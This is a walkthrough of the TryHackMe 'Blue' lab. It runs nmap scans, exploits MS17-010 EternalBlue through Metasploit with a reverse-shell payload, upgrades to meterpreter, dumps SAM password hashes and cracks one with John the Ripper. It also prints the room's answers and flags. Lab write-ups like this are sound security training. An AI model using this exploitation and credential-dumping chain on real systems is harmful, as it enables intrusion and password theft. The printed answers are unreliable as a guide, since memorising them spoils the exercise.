
【TryHackMe】Blue: Walkthrough

Overview

This is a walkthrough of the TryHackMe room "Blue".

Task1

Q1.Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)

Hint.Command: nmap -sV -vv --script vuln TARGET_IP

Run a port scan with nmap.

$ nmap -Pn -sC -A -T4 -sV 10.10.105.172
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-06 02:29 EDT
Nmap scan report for 10.10.105.172
Host is up (0.24s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
| rdp-ntlm-info: 
|   Target_Name: JON-PC
|   NetBIOS_Domain_Name: JON-PC
|   NetBIOS_Computer_Name: JON-PC
|   DNS_Domain_Name: Jon-PC
|   DNS_Computer_Name: Jon-PC
|   Product_Version: 6.1.7601
|_  System_Time: 2024-06-06T06:31:21+00:00
|_ssl-date: 2024-06-06T06:31:27+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=Jon-PC
| Not valid before: 2024-06-05T06:28:07
|_Not valid after:  2024-12-05T06:28:07
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:1f:a9:9f:52:d1 (unknown)
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: Jon-PC
|   NetBIOS computer name: JON-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2024-06-06T01:31:20-05:00
| smb2-time: 
|   date: 2024-06-06T06:31:20
|_  start_date: 2024-06-06T06:28:05
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 1h00m01s, deviation: 2h14m10s, median: 0s
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled but not required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 131.20 seconds

Q2.How many ports are open with a port number under 1000?

Hint.Near the top of the nmap output: PORT STATE SERVICE

The port scan results show that three ports with numbers under 1000 are open.

A.3

Q3.What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

Hint.Revealed by the ShadowBrokers, exploits an issue within SMBv1

Running nmap with the --script vuln option also showed that the host is exploitable via EternalBlue, the well-known SMBv1 vulnerability.

Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

A.MS17-010
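As an added example (not part of the original walkthrough), here is a small Python triage parser for nmap's normal output that answers Task 1 Q2 and Q3 mechanically and pulls out the two findings a defender would act on for this host: SMB exposed on 445 with message signing disabled, and the smb-vuln-ms17-010 script reporting VULNERABLE. The SCAN string is a constructed excerpt of the scan output above.

```python
import re

# Constructed sample: an excerpt of the walkthrough's nmap output (port table + two host-script blocks).
SCAN = """PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
49152/tcp open  msrpc              Microsoft Windows RPC
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms17-010:
|   VULNERABLE:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
"""

# One port-table row: "<port>/<proto>  <state>  <service> ..."
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)", re.M)

def open_ports(scan):
    """All ports nmap reported as open, as sorted (port, proto, service) tuples."""
    return sorted((int(p), proto, svc)
                  for p, proto, state, svc in PORT_RE.findall(scan) if state == "open")

def count_open_below(scan, limit=1000):
    """Task 1 Q2: how many open ports have a number under `limit`."""
    return sum(1 for port, _, _ in open_ports(scan) if port < limit)

def script_state(scan, script):
    """The 'State:' value inside the named NSE script block, or None if absent."""
    m = re.search(rf"^\| {re.escape(script)}:.*?^\|\s+State:\s+(\S+)", scan, re.M | re.S)
    return m.group(1) if m else None

def smb_signing(scan):
    """The smb-security-mode message_signing value (e.g. 'disabled'), or None."""
    m = re.search(r"^\|_?\s+message_signing:\s+(\w+)", scan, re.M)
    return m.group(1) if m else None

def triage(scan):
    """Summarise the findings a defender would act on for this host."""
    return {
        "open_below_1000": count_open_below(scan),
        "smb_exposed": any(port == 445 for port, _, _ in open_ports(scan)),
        "smb_signing": smb_signing(scan),
        "ms17_010": script_state(scan, "smb-vuln-ms17-010"),
    }
```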

Task2

Q1.Start Metasploit

Hint.Command: msfconsole

Start Metasploit.

$ msfconsole

Q2.Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/........)

Hint.search ms??

Search for the module with the search command.

msf6 > search smbv1

Matching Modules
================

   #  Name                                        Disclosure Date  Rank     Check  Description
   -  ----                                        ---------------  ----     -----  -----------
   0  exploit/windows/smb/ms17_010_eternalblue    2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   1  exploit/windows/smb/smb_rras_erraticgopher  2017-06-13       average  Yes    Microsoft Windows RRAS Service MIBEntryGet Overflow


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/smb/smb_rras_erraticgopher

A.exploit/windows/smb/ms17_010_eternalblue

Q3.Show options and set the one required value. What is the name of this value? (All caps for submission)

Hint.Command: show options

Select the exploit with use.

msf6 > use exploit/windows/smb/ms17_010_eternalblue 
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp

Display the parameters needed to run it with show options.

> show options

Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS                          yes       The target host(s), see https://docs.metasploit.com/docs/using-metaspl
                                             oit/basics/using-metasploit.html
   RPORT          445              yes       The target port (TCP)
   SMBDomain                       no        (Optional) The Windows domain to use for authentication. Only affects
                                             Windows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target
                                             machines.
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target. Only affects Wind
                                             ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target mach
                                             ines.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target. Only affects Windows Server
                                              2008 R2, Windows 7, Windows Embedded Standard 7 target machines.

This shows that RHOSTS is required.

A.RHOSTS

Q4.With that done, run the exploit!

Hint.Command: run (or exploit)

Set RHOSTS.

> set RHOSTS 10.10.105.172
RHOSTS => 10.10.105.172

Set a Windows reverse shell payload.

> set payload windows/x64/shell/reverse_tcp
payload => windows/x64/shell/reverse_tcp

Specify the IP address and port to listen on.
In this case, leave the port as it is and change only the IP address.

> set LHOST 10.6.55.144
LHOST => 10.6.55.144

Run the exploit with the run (or exploit) command.

Q5.Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.

The shell was obtained successfully.
Note that exploiting this vulnerability can fail repeatedly.
Retry as needed, rebooting the target machine if necessary.

[+] 10.10.133.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.133.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.133.195:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=


Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
          

C:\Windows\system32>

Task3

Q1.If you haven't already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)

Hint.Google this: shell_to_meterpreter

Background the session with Ctrl+Z.
Then search for the meterpreter module with the search command.

> search shell_to_meterpreter

Matching Modules
================

   #  Name                                    Disclosure Date  Rank    Check  Description
   -  ----                                    ---------------  ----    -----  -----------
   0  post/multi/manage/shell_to_meterpreter                   normal  No     Shell to Meterpreter Upgrade


Interact with a module by name or index. For example info 0, use 0 or use post/multi/manage/shell_to_meterpreter

A.post/multi/manage/shell_to_meterpreter

Q2.Select this (use MODULE_PATH). Show options, what option are we required to change?

Select the module with use and display the required options.

> use post/multi/manage/shell_to_meterpreter
msf6 post(multi/manage/shell_to_meterpreter) > show options

Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will try to au
                                       to detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on


View the full module info with the info, or info -d command.

This shows that the SESSION option needs to be set.

A.SESSION

Q3.Set the required option, you may need to list all of the sessions to find your target here.

Hint.sessions -l

List the sessions with sessions -l.

> sessions -l

Active sessions
===============

  Id  Name  Type               Information                                Connection
  --  ----  ----               -----------                                ----------
  1         shell x64/windows  Shell Banner: Microsoft Windows [Version   10.6.55.144:4444 -> 10.10.133.195:49169 (
                               6.1.7601] -----                            10.10.133.195)

This shows the ID of the session obtained earlier.
Set it in the option.

> set SESSION 1
SESSION => 1

Q4.Run! If this doesn't work, try completing the exploit from the previous task once more.

Hint.Command: run (or exploit)

Run it with run.

Q5.Once the meterpreter shell conversion completes, select that session for use.

Hint.sessions SESSION_NUMBER

Checking the sessions shows that a meterpreter session has been established.

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type                     Information                             Connection
  --  ----  ----                     -----------                             ----------
  1         shell x64/windows        Shell Banner: Microsoft Windows [Versi  10.6.55.144:4444 -> 10.10.119.235:4917
                                     on 6.1.7601] -----                      6 (10.10.119.235)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC            10.6.55.144:4433 -> 10.10.119.235:4918
                                                                             0 (10.10.119.235)

Select the session.

> sessions 2
[*] Starting interaction with 2...

meterpreter > 

Q6.Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command 'shell' and run 'whoami'. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again.

Open a Windows shell with the shell command and check the current user.

> shell
Process 1348 created.
Channel 1 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

Once confirmed, background it again with Ctrl+Z and return to meterpreter.

Task4

Q1.Within our elevated meterpreter shell, run the command 'hashdump'. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user?

Retrieve the password hashes with hashdump.

> hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::

We found a user named Jon.

A.Jon

Q2.Copy this password hash to a file and research how to crack it. What is the cracked password?

Hint.This password can be found within the rockyou.txt wordlist

The ffb43f0de35be4d9917ac0cc8ad57f8d part of Jon's entry is the password (NT) hash.
Crack it with John the Ripper.

$ john blue_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
alqfna22         (?)     
1g 0:00:00:00 DONE (2024-06-06 04:17) 2.325g/s 23721Kp/s 23721Kc/s 23721KC/s alr19882006..alpusidi
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed. 

The password was identified.

A.alqfna22

Task5

Q1.Flag1? This flag can be found at the system root.

Hint.Can you C it?

Search for the flag files.

> search -f *flag*
Found 6 results...
==================

Path                                                             Size (bytes)  Modified (UTC)
----                                                             ------------  --------------
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag1.lnk  482           2019-03-17 15:26:42 -0400
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag2.lnk  848           2019-03-17 15:30:04 -0400
c:\Users\Jon\AppData\Roaming\Microsoft\Windows\Recent\flag3.lnk  2344          2019-03-17 15:32:52 -0400
c:\Users\Jon\Documents\flag3.txt                                 37            2019-03-17 15:26:36 -0400
c:\Windows\System32\config\flag2.txt                             34            2019-03-17 15:32:48 -0400
c:\flag1.txt

Flags 1 through 3 were found.

> cat C:/flag1.txt
flag{access_the_machine}

A.flag{access_the_machine}

Q2.Flag2? This flag can be found at the location where passwords are stored within Windows.

Hint.I wish I wrote down where I kept my password. Luckily it's still stored here on Windows.

> cat C:/Windows/System32/config/flag2.txt
flag{sam_database_elevated_access}

A.flag{sam_database_elevated_access}

Q3.flag3? This flag can be found in an excellent location to loot. After all, Administrators usually have pretty interesting things saved.

Hint.You'll need to have elevated privileges to access this flag.

> cat C:/Users/Jon/Documents/flag3.txt
flag{admin_documents_can_be_valuable}

A.flag{admin_documents_can_be_valuable}
